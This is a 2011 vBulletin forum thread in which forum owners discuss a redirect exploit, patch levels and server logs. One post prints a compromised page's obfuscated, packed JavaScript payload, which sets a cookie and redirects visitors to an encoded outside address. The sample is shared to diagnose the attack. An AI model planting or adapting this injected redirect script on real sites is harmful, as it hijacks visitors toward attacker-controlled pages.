This was 'beliigerent'?
For the record we have always asked people to start theie own thread with their specific issue. That way we can concentrate or their problem and not have it diluted by a bunch of other people using the same thread for issues that may or may not be identical.
Sorry if that offended anyone, but this is nothing new.
vBulletin 3.x and 4.x Redirect Security Exploit
Collapse
This topic is closed.
X
X
-
I have;
http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working
And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.
Another instance which makes it beyond any doubt that my forums future lies with XenForo.Leave a comment:
-
I have;
http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working
And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.
Another instance which makes it beyond any doubt that my forums future lies with XenForo.Leave a comment:
-
http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working
And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.
Another instance which makes it beyond any doubt that my forums future lies with XenForo.Leave a comment:
-
The redirect is back and the errors have stopped! Why?
The last error was at 17:12:22
From access log:
77.245.91.19 - - [03/Jun/2011:17:12:16 +0200] "GET
/18905-fiat-presenteert-ruim-aangeklede-fiat-500-twinair.html HTTP/1.0" 200
10354 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
66.249.72.100 - -
[03/Jun/2011:17:12:16 +0200] "GET /volvo/ HTTP/1.1" 200 18828 "-" "Mozilla/5.0
(compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.245.91.19 -
- [03/Jun/2011:17:12:19 +0200] "GET /18939-vanafprijs-chevrolet-aveo.html
HTTP/1.0" 200 10246 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0
(compatible; Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:22 +0200] "GET /18973-audi-prijst-q3.html HTTP/1.0" 200 10258
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
93.125.201.157 - -
[03/Jun/2011:17:12:25 +0200] "POST /register.php?do=checkdate HTTP/1.1" 200 5513
"http://www.nationaalautoforum.nl/register.php" "Mozilla/4.0 (compatible; MSIE
8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET
CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
77.245.91.19 - - [03/Jun/2011:17:12:25 +0200] "GET
/18916-nissan-leaf-veiligste-ev-ooit-met-5-ncap-sterren.html HTTP/1.0" 200 10380
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:29 +0200] "GET
/18917-belastingvoordeel-zuinige-auto-s-verdwijnt.html HTTP/1.0" 200 11546
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
There is nothing strange to see...?Leave a comment:
-
That's just a PHP warning but what's interesting is it implicates class_bbcode.php - the first time I've seen that specifically.Leave a comment:
-
I also noticed the following...
In the error logs it shows:
[Fri Jun 03 16:52:11 2011] [error] [client 77.245.91.19] PHP Warning: Call-time
pass-by-reference has been deprecated - argument passed by value; If you would
like to pass it by reference, modify the declaration of [runtime function
name](). If you would like to enable call-time pass-by-reference, you can set
allow_call_time_pass_reference to true in your INI file. However, future
versions may not support this any longer. in
/var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
eval()'d code on line 7, referer: http://www.nationaalautoforum.nl/mijn-auto/
many times. It started showing when the redirect stopped working.
Anybody?Leave a comment:
-
One of our sites was hit by the redirect from google.
In Google results page I right-clicked on our link and chose 'save link', so I saved our page without visiting it. I opened the page in notebook and this is what I got:
<html><head></head><body><script type=
"text/javascript">var vbsp='CA433C43';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\ M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\ k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\ c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|va r|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|fun ction|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|' ),0,{}))</script></body></html>
I can't find this code in my templates. Is it of any use defining where it comes from?Leave a comment:
-
-
-
Btw, afaik, neither affected file exists in 3.x. The only way a 3.x forum would have had access to them is if they were using the remote hosted option, but yahoo patched them ages ago.Leave a comment:
-
Leave a comment:
-
-
Originally posted by Marvindoes the 3.8.7 PL1 include the latest YUI, or it doesn't?
Originally posted by ZacheryRight now, i Don't believe it does
Originally posted by BrianThanks for the confirmation of a half-patch.
Patching on my own, again...Leave a comment:
-
It looks like there has been a 4-1-3_Patch_Level_1 patch released since I last upgraded. Has anyone been hit after installing that one?Leave a comment:
Related Topics
Collapse
-
by CorbinHHi at vB,
I am planning to update our site Australian Photoholics Forum "ausph.com" to SSL.
Last time we tried this, we broke our site which was down for a week!
Everyone here...-
Channel: Support Issues & Questions
-
-
by fionixHi,
I was just wondering how you get the URL shorten in Vbulletin 5.1.7 ?
From what I can see you have it done here at vbulletin.com - see url below... there is this number (which...-
Channel: Support Issues & Questions
-
-
by zyuzGood afternoon.I set ssl whatever forum was on the https protocol, prescribed in your permanent address offline via https, but do not know how to do so, that would be a http version offline (http://f...
-
Channel: Support Issues & Questions
-
-
by rag_gupta
-
Channel: Support Issues & Questions
-
Leave a comment: